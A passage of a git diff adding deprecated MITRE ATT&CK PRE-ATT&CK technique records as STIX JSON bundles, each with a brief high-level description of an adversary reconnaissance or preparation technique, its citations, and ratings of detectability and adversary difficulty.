(Citation: ICD204) (Citation: KIT-Herring)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1237", + "external_id": "T1237" + }, + { + "source_name": "ICD204", + "description": "Office of the Director of National Intelligence. (2015, January 02). Retrieved March 5, 2017." + }, + { + "source_name": "KIT-Herring", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1014", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983.json new file mode 100644 index 0000000000000000000000000000000000000000..95e6a5af400e1ef8ca249151365d9c49e4003b34 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--fd34a9f5-e537-4781-a305-1c7efb63c6c6", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire or compromise 3rd party signing certificates", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1332).\n\nCode signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1332", + "external_id": "T1332" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "source_name": "DiginotarCompromise", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1109", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa.json new file mode 100644 index 0000000000000000000000000000000000000000..bcaa25a7efbdf6c3e6ce25b36237e48776c342ee --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--bfd1e876-c988-40c3-b653-3c82858c17b7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Authorized user performs requested cyber action", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nClicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1386", + "url": "https://attack.mitre.org/techniques/T1386" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-10-14T01:53:27.989Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1163", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Users unwittingly click on spearphishing links frequently, despite training designed to educate about the perils of spearphishing.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Some environments have anti-spearphishing mechanisms to detect or block the link before it reaches the user.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3.json new file mode 100644 index 0000000000000000000000000000000000000000..4eafcf5d124d124f870c61cfd849056b8f8f2851 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--8945758e-f5e0-4e1d-9cfd-fe0a81215fed", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify security defensive capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1263).\n\nSecurity defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1263", + "external_id": "T1263" + }, + { + "source_name": "OSFingerprinting2014", + "description": "InfoSec Institute. (2014, June 19). What You Must Know About OS Fingerprinting. Retrieved March 1, 2017." + }, + { + "source_name": "NMAP WAF NSE", + "description": "Paulino Calderon. (n.d.). http-waf-detect. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Technically, the defender has the ability to detect. However, this is typically not performed as this type of traffic would likely not prompt the defender to take any actionable defense. In addition, this would require the defender to closely review their access logs for any suspicious activity (if the activity is even logged).", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "The adversary will have some insight into defenses based on dropped traffic or filtered responses. It is more difficult to pinpoint which defenses are implemented (e.g., [https://www.fireeye.com FireEye] WMPS, [https://www.hpe.com Hewlett Packard Enterprise] Tipping Point IPS).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1040", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6.json new file mode 100644 index 0000000000000000000000000000000000000000..b10245440d8d2821feb0c932c3890697cd7e91e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--f8fa734f-50c1-4584-bdcb-c77ccdd741e9", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test callback functionality", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1356).\n\nCallbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1356", + "external_id": "T1356" + }, + { + "source_name": "LeeBeaconing", + "description": "Tony Lee. (2012, December 11). Testing Your Defenses - Beaconing. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the test and defender likely has no visibility.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary controls or acquires all pieces of infrastructure and can test outside of defender's visibility.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1133", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1.json new file mode 100644 index 0000000000000000000000000000000000000000..525e38f98e006ff1cedff4ca2b68e066e220fc9a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--072a9967-6e11-402d-9426-ac792ecb4bbd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify job postings and needs/gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1267).\n\nJob postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1267", + "external_id": "T1267" + }, + { + "source_name": "JobPostingThreat", + "description": "Jay D. Krasnow. (2000, October). The Competitive Intelligence and National Security Threat from Website Job Listings. Retrieved March 16, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1044", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc.json new file mode 100644 index 0000000000000000000000000000000000000000..2a578d1f4bed097d1b377b9797becc914154668d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--ba75ac32-4057-47d5-b2ca-084034df1c06", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze organizational skillsets and deficiencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1289).\n\nAnalyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1289", + "external_id": "T1289" + }, + { + "source_name": "FakeLinkedIn", + "description": "LIFARS. (2015, October 8). Hackers Fake LinkedIn Profiles to Scout Targets. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Job postings and hiring requisitions have to be made public for contractors and many times have the name of the organization being supported. In addition, they outline the skills needed to do a particular job, which can provide insight into the technical structure and organization of a target.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1066", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624.json new file mode 100644 index 0000000000000000000000000000000000000000..e424264ac01f5e2a217928546ae97457f5f8066e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--cc716cb4-3d47-4c4a-abb4-919ff8006658", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify people of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1269).\n\nThe attempt to identify people of interest or with an inherent weakness for direct or indirect targeting to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1269", + "external_id": "T1269" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Common defenses protecting against poor OPSEC practices are traditionally more policy-based in nature rather than technical. Policy-based mitigations are generally more difficult to enforce and track violations, making it more difficult that this technique can be detected by common defenses.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Specialty cases enable an adversary to use key words in order to search social media and identify personnel with poor OPSEC practices who may have access to specialized information which would make them a target of interest. In addition, the open nature of social media leads to a tendency among individuals to overshare, encouraging poor OPSEC and increasing the ease by which an adversary can identify interesting targets.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1046", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6.json new file mode 100644 index 0000000000000000000000000000000000000000..ce9aa1315712bbbccb768c80764d5a851658a472 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--ac1fb54e-10f0-4921-a591-fe3c06db82cd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Common, high volume protocols and software", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1321).\n\nCertain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary's traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1321", + "external_id": "T1321" + }, + { + "source_name": "symantecNITRO", + "description": "Eric Chien and Gavin O\u2019Gorman. (n.d.). The Nitro Attacks: Stealing Secrets from the Chemical Industry. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "High level of entropy in communications. High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to decipher or to make the communication less conspicuous.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1098", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0.json new file mode 100644 index 0000000000000000000000000000000000000000..f3809e874e304e262ede363ccc88ed949a494a95 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--13b64ed4-6068-4b26-99c2-2f7afef7ccd1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Replace legitimate binary with malware", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nReplacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1378", + "url": "https://attack.mitre.org/techniques/T1378" + }, + { + "description": "Daavid and Antti. (2014, June 23). Havex Hunts For ICS/SCADA Systems. Retrieved March 9, 2017.", + "source_name": "FSecureICS" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:23:46.977Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1155", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Requires the adversary to replace a binary on a website where users will download the binary (e.g., patch, firmware update, software application) as innately trusted. The additional challenge is the reduced set of vendor-trusted websites that are vulnerable.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "On the host end user system, integrity checking (e.g., hash verification, code signing enforcement), application whitelisting, sandboxing, or behavioral-based/heuristic-based systems are most likely to be successful in detecting this technique. On the source webserver, detecting binary changes is easy to detect if performed.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729.json new file mode 100644 index 0000000000000000000000000000000000000000..355e64faf691dd7c459300f3318a272f5fc569e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--51596030-6bde-4517-9a5b-c55423b63f59", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Automated system performs requested action", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nUsers may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. (Citation: WSUSpect2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1384", + "url": "https://attack.mitre.org/techniques/T1384" + }, + { + "description": "Paul Stone & Alex Chapman. (2015, August 5). WSUSpect: Compromising the Windows Enterprise via Windows Update. Retrieved March 1, 2017.", + "source_name": "WSUSpect2015" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:15:05.089Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1161", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Autoruns with USB keys and CDs traditionally were always on (e.g., [http://windows.microsoft.com Windows] 7 is now an exception with a new policy of limiting the always on nature of Autoruns), ensuring and automated system completes a requested action. Specialized use cases exist where automated systems are specifically designed against automatically performing certain actions (e.g., USB/CD insertion and automatically running is disabled in certain environments).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Environments without extensive endpoint sensing capabilities do not typically collect this level of detailed information.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb.json new file mode 100644 index 0000000000000000000000000000000000000000..dfec789ed25db0ce72af496953ab9b65eef9b41c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--ff4cc189-a1fc-47e5-a2ce-f2417129775f", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify analyst level gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1233).\n\nAnalysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1233", + "external_id": "T1233" + }, + { + "source_name": "BrighthubGapAnalysis", + "description": "Ronda Bowen. (2014, March 26). Performing a Gap Analysis: Where Do You Begin?. Retrieved March 14, 2017." + }, + { + "source_name": "ICD115", + "description": "Office of the Director of National Intelligence. (2012, December 21). ICD 115: Intelligence Community Capability Requirements Process. Retrieved March 2, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1010", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33.json new file mode 100644 index 0000000000000000000000000000000000000000..63110d749b1269c8e71f13af639746a666f34fe1 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--337bd8a7-ffc9-4e1b-88bc-aeb956a4179c", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Friend/Follow/Connect to targets of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) 